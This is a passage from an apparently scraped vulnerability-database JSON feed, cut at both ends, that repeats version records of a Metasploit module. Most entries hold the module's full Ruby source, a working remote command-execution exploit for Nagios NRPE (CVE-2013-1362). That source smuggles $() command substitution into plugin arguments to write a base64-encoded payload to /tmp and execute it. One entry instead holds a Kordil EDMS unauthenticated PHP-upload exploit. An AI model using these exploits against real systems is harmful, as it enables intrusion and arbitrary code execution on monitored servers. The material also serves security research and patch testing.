Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-28T20:33:19", "differentElements": ["cvss"], "edition": 92}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "b8fd29a158b5b91d5ab7a065082cbc04", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-05-29T14:31:13", "history": [], "viewCount": 125, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "openvas", "idList": ["OPENVAS:865802", "OPENVAS:1361412562310120026", "OPENVAS:1361412562310850460", "OPENVAS:865756", "OPENVAS:1361412562310850457", "OPENVAS:1361412562310865802", "OPENVAS:850457", "OPENVAS:1361412562310865756", "OPENVAS:850460", "OPENVAS:1361412562310121262"]}, {"type": "nessus", "idList": ["FEDORA_2013-9829.NASL", "FEDORA_2013-9848.NASL", "FEDORA_2013-9836.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "ALA_ALAS-2013-203.NASL", "OPENSUSE-2013-301.NASL", "NAGIOS_NRPE_2_14.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0624-1", "SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "saint", "idList": ["SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-05-29T14:31:13"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-29T14:31:13", "differentElements": ["sourceData"], "edition": 93}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "7af0909609ddf9c8e970b9a830af05bd", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-06-11T00:33:01", "history": [], "viewCount": 125, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "openvas", "idList": ["OPENVAS:865802", "OPENVAS:1361412562310120026", "OPENVAS:1361412562310850460", "OPENVAS:865756", "OPENVAS:1361412562310850457", "OPENVAS:1361412562310865802", "OPENVAS:850457", "OPENVAS:1361412562310865756", "OPENVAS:850460", "OPENVAS:1361412562310121262"]}, {"type": "nessus", "idList": ["FEDORA_2013-9829.NASL", "FEDORA_2013-9848.NASL", "FEDORA_2013-9836.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "ALA_ALAS-2013-203.NASL", "OPENSUSE-2013-301.NASL", "NAGIOS_NRPE_2_14.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0624-1", "SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "saint", "idList": ["SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-05-29T14:31:13"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-11T00:33:01", "differentElements": ["sourceData"], "edition": 94}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "b8fd29a158b5b91d5ab7a065082cbc04", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-06-11T02:33:16", "history": [], "viewCount": 125, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": null}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-11T02:33:16", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 95}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "452188f9368b6bfc35fed38f81ff234a", "type": "metasploit", "bulletinFamily": "exploit", "title": "Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability", "description": "This module exploits a vulnerability in Kordil EDMS v2.2.60rc3. This application has an upload feature that allows an unauthenticated user to upload arbitrary files to the '/kordil_edms/userpictures/' directory.\n", "published": "2013-02-25T19:29:27", "modified": "2019-01-10T19:19:14", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-11T22:36:49", "history": [], "viewCount": 125, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": null}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/kordil_edms_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability in Kordil EDMS v2.2.60rc3.\n This application has an upload feature that allows an unauthenticated user\n to upload arbitrary files to the '/kordil_edms/userpictures/' directory.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'bcoles' # Discovery and exploit\n ],\n 'References' =>\n [\n ['OSVDB', '90645'],\n ['EDB', '24547'],\n ],\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n ['Automatic Targeting', { 'auto' => true }]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Feb 22 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The path to the web application', '/kordil_edms/']),\n ])\n end\n\n def check\n\n base = target_uri.path\n peer = \"#{rhost}:#{rport}\"\n\n # retrieve software version from login page\n begin\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(base, 'global_group_login.php')\n })\n if res and res.code == 200\n if res.body =~ /<center><font face=\"Arial\" size=\"2\">Kordil EDMS v2\\.2\\.60/\n return Exploit::CheckCode::Appears\n elsif res.body =~ /Kordil EDMS v/\n return Exploit::CheckCode::Detected\n end\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\n vprint_error(\"Connection failed\")\n return Exploit::CheckCode::Unknown\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def upload(base, file)\n data = Rex::MIME::Message.new\n data.add_part(file, 'text/x-php', nil, \"form-data; name=\\\"upload_fd31\\\"; filename=\\\"#{@fname}.php\\\"\")\n data.add_part(\"#{@fname}\", nil, nil, 'form-data; name=\"add_fd0\"')\n data.add_part(\"#{@fname}\", nil, nil, 'form-data; name=\"add_fd27\"')\n data.add_part(\"n\", nil, nil, 'form-data; name=\"act\"')\n data_post = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'users_add.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => data_post\n })\n return res\n end\n\n def on_new_session(client)\n if client.type == \"meterpreter\"\n client.core.use(\"stdapi\") if not client.ext.aliases.include?(\"stdapi\")\n client.fs.file.rm(\"#{@fname}.php\")\n else\n client.shell_command_token(\"rm #{@fname}.php\")\n end\n end\n\n\n def exploit\n\n base = target_uri.path\n @fname = rand_text_numeric(7)\n\n # upload PHP payload to userpictures/[fname].php\n print_status(\"Uploading PHP payload (#{payload.encoded.length} bytes)\")\n php = %Q|<?php #{payload.encoded} ?>|\n begin\n res = upload(base, php)\n if res and res.code == 302 and res.headers['Location'] =~ /\\.\\/user_account\\.php\\?/\n print_good(\"File uploaded successfully\")\n else\n fail_with(Failure::UnexpectedReply, \"#{peer} - Uploading PHP payload failed\")\n end\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\n fail_with(Failure::Unreachable, \"#{peer} - Connection failed\")\n end\n\n # retrieve and execute PHP payload\n print_status(\"Executing payload (userpictures/#{@fname}.php)\")\n begin\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(base, 'userpictures', \"#{@fname}.php\")\n })\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\n fail_with(Failure::Unreachable, \"#{peer} - Connection failed\")\n end\n\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-11T22:36:49", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 96}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "b8fd29a158b5b91d5ab7a065082cbc04", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-06-12T00:35:40", "history": [], "viewCount": 125, "enchantments": {"score": {"value": 8.7, "vector": "NONE", "modified": "2019-06-12T00:35:40"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0624-1", "OPENSUSE-SU-2013:0621-1", "SUSE-SU-2013:1219-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "openvas", "idList": ["OPENVAS:865802", "OPENVAS:1361412562310850460", "OPENVAS:1361412562310120026", "OPENVAS:1361412562310865802", "OPENVAS:1361412562310865756", "OPENVAS:850457", "OPENVAS:850460", "OPENVAS:865756", "OPENVAS:1361412562310850457", "OPENVAS:1361412562310121262"]}, {"type": "nessus", "idList": ["FEDORA_2013-9829.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "NAGIOS_NRPE_2_14.NASL", "FEDORA_2013-9836.NASL", "OPENSUSE-2013-301.NASL", "ALA_ALAS-2013-203.NASL", "FEDORA_2013-9848.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "saint", "idList": ["SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:E0F846270087DB671556237BDF17DDDE"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-06-12T00:35:40"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not 